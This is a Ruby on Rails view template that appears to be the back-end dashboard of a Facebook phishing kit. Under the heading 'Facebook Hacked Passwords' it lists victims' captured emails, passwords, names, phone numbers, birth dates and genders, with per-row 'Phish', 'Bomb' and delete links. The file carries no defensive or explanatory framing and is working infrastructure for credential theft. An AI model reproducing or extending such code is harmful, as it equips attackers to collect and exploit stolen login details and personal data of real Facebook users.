
<!--<div class="container">-->
  <!--&lt;!&ndash;<%# if flash[:error] %>&ndash;&gt;-->
      <!--&lt;!&ndash;
      <div id="flash" class="flash-"><%#= flash[:error] %></div>&ndash;&gt;-->
  <!--&lt;!&ndash;<%# end %>&ndash;&gt;-->
<!--</div>-->

<!--</div>-->

<div class="container">
  <% flash.each do |message_type, message| %>
      <div id="flash" class="flash-<%= message_type %>" align="center" style="background-color: deepskyblue;vertical-align: middle;line-height: 50px;color: white;font-size: larger">
        <%= message %>
      </div>

  <% end %>
</div>

<!--</div>-->

<style>
  .w3-button  {
    margin: 0;
    height: 150px;
    width: 150px;
    border-radius: 200%;
    border: 1px orange;
    position:fixed;
    margin-right: auto;
    right:0;
    bottom:0;
    padding:0;
    color: white;
    background-color: green;

  }

  @-moz-keyframes blink {
    0% {
      opacity: 0;
    }
    70% {
      opacity: 1;
    }

  }

  .w3-button  {
    -webkit-animation: blink 1s;
    -webkit-animation-iteration-count: infinite;
    -moz-animation: blink 1s;
    -moz-animation-iteration-count: infinite;
    -o-animation: blink 1s;
    -o-animation-iteration-count: infinite;
  }
  #flash {
    -webkit-animation: seconds 1.0s forwards;
    -webkit-animation-iteration-count: 1;
    -webkit-animation-delay: 5s;
    animation: seconds 1.0s forwards;
    animation-iteration-count: 1;
    animation-delay: 2.5s;
    -moz-text-align-last: center;

  }
  @-webkit-keyframes seconds {
    0% {
      opacity: 1;
    }
    100% {
      opacity: 0;
      left: -9999px;
    }
  }
  @keyframes seconds {
    0% {
      opacity: 1;
    }
    100% {
      opacity: 0;
      left: -9999px;
    }
  }

</style>


<table align="center">
  <thead>
  <tr>
    <td style="border: groove;width: 12cm;background-color: forestgreen;color: black" align="center" colspan="12"><h1 align="center">Facebook Hacked Passwords</h1></td>
  </tr>
  <tr style="border: groove">

    <td style="border: groove;width: 6cm;height: 1cm;background-color: forestgreen;color: white" align="center">Email</td>
    <td style="border: groove;width: 6cm;height: 1cm;background-color: forestgreen;color: white" align="center">Password</td>
    <td style="border: groove;width: 6cm;height: 1cm;background-color: forestgreen;color: white" align="center">Firstname</td>
    <td style="border: groove;width: 6cm;height: 1cm;background-color: forestgreen;color: white" align="center">Surname</td>
    <td style="border: groove;width: 6cm;height: 1cm;background-color: forestgreen;color: white" align="center">Mobile</td>
    <td style="border: groove;width: 6cm;height: 1cm;background-color: forestgreen;color: white" align="center">New password</td>
    <td style="border: groove;width: 6cm;height: 1cm;background-color: forestgreen;color: white" align="center">Dob</td>
    <td style="border: groove;width: 6cm;height: 1cm;background-color: forestgreen;color: white" align="center">Gender</td>
    <td style="border: groove;width: 6cm;height: 1cm;background-color: forestgreen;color: white" align="center">Received at</td>
    <td style="border: groove;width: 6cm;height: 1cm;background-color: forestgreen;color: white" align="center">Delete</td>
    <td style="border: groove;width: 6cm;height: 1cm;background-color: forestgreen;color: white" align="center">Phish</td>

    <td style="border: groove;width: 6cm;height: 1cm;background-color: forestgreen;color: white" align="center">Bomb</td>

  </tr>
  </thead>

  <tbody>
  <% @fbs.each do |fb| %>
      <tr>
        <td style="border: groove;width: 6cm;height: 0.5cm" align="center" ><%= fb.email %></td>
        <td style="border: groove;width: 6cm;height: 0.5cm" align="center" ><%= fb.password %></td>
        <td style="border: groove;width: 6cm;height: 0.5cm" align="center" ><%= fb.firstname %></td>
        <td style="border: groove;width: 6cm;height: 0.5cm" align="center" ><%= fb.surname %></td>
        <td style="border: groove;width: 6cm;height: 0.5cm" align="center" ><%= fb.mobile %></td>
        <td style="border: groove;width: 6cm;height: 0.5cm" align="center" ><%= fb.newpassword %></td>
        <td style="border: groove;width: 6cm;height: 0.5cm" align="center" ><%= fb.dob %></td>
        <td style="border: groove;width: 6cm;height: 0.5cm" align="center" ><%= fb.gender %></td>
        <td style="border: groove;width: 6.5cm;height: 0.5cm" align="center">Date: <%=fb.created_at.strftime("%d %b. %Y")%>, Time: <%= fb.created_at.strftime("%I:%M %p")%></td>
        <td style="border: groove;width: 6cm;height: 0.5cm" align="center" ><%= link_to 'Destroy', fb, method: :delete, data: { confirm: 'Are you sure?' },remote: true %></td>
        <td style="border: groove;width: 6cm;height: 0.5cm" align="center" ><%= link_to 'Phish', fb %></td>

        <td style="border: groove;width: 6cm;height: 0.5cm" align="center" ><%= link_to 'Bomb', edit_fb_path(fb) %></td>
      </tr>
  <% end %>
  </tbody>
</table>

<br>



